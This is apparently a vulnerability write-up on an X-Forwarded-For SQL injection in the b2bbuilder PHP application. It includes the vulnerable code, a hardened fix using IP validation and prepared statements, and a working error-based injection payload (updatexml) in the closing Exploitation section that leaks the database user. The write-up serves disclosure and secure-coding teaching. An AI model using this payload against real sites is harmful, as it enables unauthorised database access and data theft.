Contents
  1. Code analysis
  2. Exploitation

Code analysis

A fairly classic X-Forwarded-For SQL injection. b2bbuilder does apply addslashes to request input, but the function it uses to obtain the client IP looks like this:

function getip()
{
    if (isset($_SERVER)) {
        // Proxy headers are supplied by the client; nothing escapes or validates them here
        if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
            $realip = $_SERVER['HTTP_X_FORWARDED_FOR'];
        } elseif (isset($_SERVER['HTTP_CLIENT_IP'])) {
            $realip = $_SERVER['HTTP_CLIENT_IP'];
        } else {
            $realip = $_SERVER['REMOTE_ADDR'];
        }
    } else {
        if (getenv("HTTP_X_FORWARDED_FOR")) {
            $realip = getenv("HTTP_X_FORWARDED_FOR");
        } elseif (getenv("HTTP_CLIENT_IP")) {
            $realip = getenv("HTTP_CLIENT_IP");
        } else {
            $realip = getenv("REMOTE_ADDR");
        }
    }
    return $realip;
}

Many places call this function to get the IP and concatenate the result into SQL that is then executed, for example login.php and register.php; there are others too, but since they all share the same root cause they were not tested one by one. Registration is used as the example.

$ip=getip();$ip=empty($ip)?NULL:$ip;   // raw header value, addslashes is never applied to it
$nt=time();$regtime=date("Y-m-d H:i:s");

$db=new dba($config['dbhost'],$config['dbuser'],$config['dbpass'],$config['dbname'],$config['dbport']);

$sql="select * from  ".ALLUSER." where user='$user' or email='$email'";
$db->query($sql);
if($db->num_rows())
    die("User name is have");
//----------------
if(!empty($config['user_reg'])&&$config['user_reg']!=3)
    $user_reg=$config['user_reg'];
elseif($config['user_reg']==3)
    $user_reg=1;
else
    $user_reg=2;
//----------------
// $ip is concatenated straight into the INSERT statement
$sql="insert into ".ALLUSER."
 (user,password,ip,lastLoginTime,qq,msn,sex,mobile,position,email,country,regtime,statu,name)
 values
 ('$user','".md5($pass)."','$ip','$nt','$_POST[qq]','$_POST[msn]','$_POST[sex]','$_POST[mobile]','$_POST[pos]','$email','$country','$regtime','$user_reg','$_POST[realname]')";
$re=$db->query($sql);

Starting at line 103. The IP obtained this way ultimately ends up in:

insert into ".ALLUSER."
 (user,password,ip,lastLoginTime,qq,msn,sex,mobile,position,email,country,regtime,statu,name)
 values
 ('$user','".md5($pass)."','$ip','$nt','$_POST[qq]','$_POST[msn]','$_POST[sex]','$_POST[mobile]','$_POST[pos]','$email','$country','$regtime','$user_reg','$_POST[realname]')
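The two defects above are that the header value is trusted as-is and that it is spliced into the statement as a string. An added example of how a fixed version would look (this is not b2bbuilder's code; the table name b2bbuilder_alluser, the trusted proxy address 10.0.0.1 and the in-memory SQLite database are assumptions standing in for the real schema and MySQL server):

```php
<?php
// Added example, not from b2bbuilder: a hardened replacement for getip() and a
// parameterised INSERT in place of the concatenated one shown in register.php.

/**
 * Return the client IP. X-Forwarded-For is client-controlled, so it is only
 * consulted when the TCP peer is one of our own reverse proxies, and whatever
 * is taken from it must still parse as a literal IP address.
 */
function getip_safe(array $server, array $trustedProxies = []): string
{
    $remote = $server['REMOTE_ADDR'] ?? '';
    if (in_array($remote, $trustedProxies, true) && !empty($server['HTTP_X_FORWARDED_FOR'])) {
        // XFF is a comma-separated chain; the first entry is the original client.
        $first = trim(explode(',', $server['HTTP_X_FORWARDED_FOR'])[0]);
        if (filter_var($first, FILTER_VALIDATE_IP) !== false) {
            return $first;
        }
        // A value such as "1.1.1.1'" fails validation and is discarded, not stored.
    }
    return filter_var($remote, FILTER_VALIDATE_IP) !== false ? $remote : '0.0.0.0';
}

/** Insert the registration row with bound parameters instead of string building. */
function insert_user(PDO $db, string $user, string $passHash, string $ip, string $email): void
{
    // Table name is an assumption; the page only shows the ALLUSER constant.
    $stmt = $db->prepare(
        'INSERT INTO b2bbuilder_alluser (user, password, ip, email) VALUES (:user, :pw, :ip, :email)'
    );
    // Values travel separately from the SQL text, so a quote in $ip cannot alter the statement.
    $stmt->execute([':user' => $user, ':pw' => $passHash, ':ip' => $ip, ':email' => $email]);
}

// --- demonstration with constructed requests (assumes the pdo_sqlite extension) ---
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE b2bbuilder_alluser (user TEXT, password TEXT, ip TEXT, email TEXT)');

$requests = [
    // The header from the page's test, arriving through the (assumed) trusted proxy 10.0.0.1
    ['REMOTE_ADDR' => '10.0.0.1', 'HTTP_X_FORWARDED_FOR' => "1.1.1.1'"],
    // A well-formed chain through the same proxy
    ['REMOTE_ADDR' => '10.0.0.1', 'HTTP_X_FORWARDED_FOR' => '203.0.113.7, 10.0.0.1'],
    // A direct connection that sets the header itself; the header must be ignored
    ['REMOTE_ADDR' => '198.51.100.9', 'HTTP_X_FORWARDED_FOR' => '203.0.113.7'],
];

foreach ($requests as $i => $server) {
    $ip = getip_safe($server, ['10.0.0.1']);
    insert_user($db, "user$i", password_hash('constructed-password', PASSWORD_DEFAULT), $ip, "user$i@example.invalid");
    echo "stored ip: $ip\n";
}

// Every stored value is a plain IP address; the malformed header never reached the database.
foreach ($db->query('SELECT user, ip FROM b2bbuilder_alluser') as $row) {
    echo $row['user'], ' -> ', $row['ip'], "\n";
}
```

The first request falls back to the proxy's own address because the header value is not a valid IP; the second yields the first hop of the chain; the third keeps REMOTE_ADDR because the peer is not a trusted proxy. Either of the two changes alone (validation or parameter binding) would stop the injection below; together they also stop a spoofed header from being recorded as the visitor's address.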

Testing with the header changed to X-Forwarded-For: 1.1.1.1' the server returned:

insert into b2bbuilder_page_view
(url,ip,time,username,fileName)
values
('%2Fb2bbuilder%2Fregister.php','1.1.1.1'','2015-05-14 17:21:11','test','/b2bbuilder/register.php')You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '2015-05-14 17:21:11','test','/b2bbuilder/register.php')' at line 4

Exploitation

PoC: X-Forwarded-For: 1.1.1.1' or updatexml(1,concat(0x5c,user()),1) or '

insert into b2bbuilder_page_view
    (url,ip,time,username,fileName)
    values
    ('%2Fb2bbuilder%2Fregister.php','1.1.1.1' or updatexml(1,concat(0x5c,user()),1) or '','2015-05-14 19:27:43','test','/b2bbuilder/register.php')XPATH syntax error: '\root@localhost'